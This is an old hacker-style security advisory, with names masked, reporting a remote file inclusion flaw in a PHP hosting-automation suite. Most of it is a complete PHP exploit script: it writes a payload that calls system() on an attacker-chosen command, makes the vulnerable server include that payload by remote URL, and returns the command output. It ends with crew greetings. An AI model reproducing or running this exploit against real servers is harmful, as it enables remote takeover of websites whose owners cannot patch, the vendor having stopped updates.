بدون شرح
==================================================  =====================================

*** :: Security Advisory                                                 2/11/2006

==================================================  =====================================

*** - Remote Command Execution Vulnerability

==================================================  =====================================

http://www.***.net/

http://www.***.net/***

==================================================  =====================================



:: Summary



      Vendor       :  ***

      Vendor Site  :  http://www.***.com/

      Product(s)   :  ***- Automated Hosting Suite

      Version(s)   :  All

      Severity     :  Medium/High

      Impact       :  Remote Command Execution

      Release Date :  2/11/2006

      Credits      :  ***(***(a) ***(.) net)



==================================================  =====================================



I. Description



By creating a product that integrates with the major payment processors, registrars, 

and provisioning tools on the market, ***gives your hosting company the power 

to bill and activate hosting accounts in real-time, even while you sleep at night!





==================================================  =====================================



II. Synopsis



There is a remote file inclusion vulnerability that allows for remote command execution

in the index.php file.  The bug is here on lines 5, 6, and 7: 



require("setup.php");

require("functions.php");

require("db.conf");

require($path . "que.php");

require($path . "provisioning_manager.php");

require($path . "registrar_manager.php");



the $path variable is not set prior to being used in the require() function.

The vendor is no longer offering updates for this software.



==================================================  =====================================



Exploit code:



-----BEGIN-----



<?php

/*

***Remote File Inclusion Exploit c0ded by ***

Sh0uts: ***net, ***, ***, #***, ***

url:  http://www.***.net/***

*/



$cmd = $_POST["cmd"];

$turl = $_POST["turl"];

$hurl = $_POST["hurl"];



$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"

    ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"

    ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"

    ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"

    ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"

    ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";



if (!isset($_POST['submit'])) 

{



echo $form;



}else{



$file = fopen ("test.txt", "w+");



fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); 

system(\"echo ++END++\"); ?>");

fclose($file);



$file = fopen ($turl.$hurl, "r");

if (!$file) {

    echo "<p>Unable to get output.\n";

    exit;

}



echo $form;



while (!feof ($file)) {

    $line .= fgets ($file, 1024)."<br>";

    }

$tpos1 = strpos($line, "++BEGIN++");

$tpos2 = strpos($line, "++END++");

$tpos1 = $tpos1+strlen("++BEGIN++");

$tpos2 = $tpos2-$tpos1;

$output = substr($line, $tpos1, $tpos2);

echo $output;



}

?>





------END------



==================================================  =====================================



IV. Greets :>



All of **, ***, ***, ***, ***, ***, ***.



==================================================  =====================================